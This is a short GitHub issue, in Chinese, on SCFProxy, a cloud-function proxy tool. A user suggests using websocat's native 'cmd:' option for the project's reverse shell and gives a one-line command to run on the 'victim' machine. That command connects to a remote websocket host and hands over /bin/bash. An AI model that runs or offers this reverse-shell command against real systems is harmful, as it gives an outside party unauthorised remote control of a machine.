shimmeris / SCFProxy

A proxy tool based on cloud function.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

websocat 反弹shell 能否使用原生参数?

Green-m opened this issue · comments

websocat 原生支持反弹命令,类似于ncat 的 -e 参数

	cmd:            	Start specified command line using `sh -c` or `cmd /C` (depending on platform)
	exec:           	Execute a program directly (without a subshell), providing array of arguments on Unix [A]

所以是不是可以简化一下直接在 victim 端 执行如下命令:

websocat ws://tencentcloud.com  cmd:/bin/bash --text -v

我在其他云上测试了一下可行,未在腾讯云上测试。

commented

感谢提醒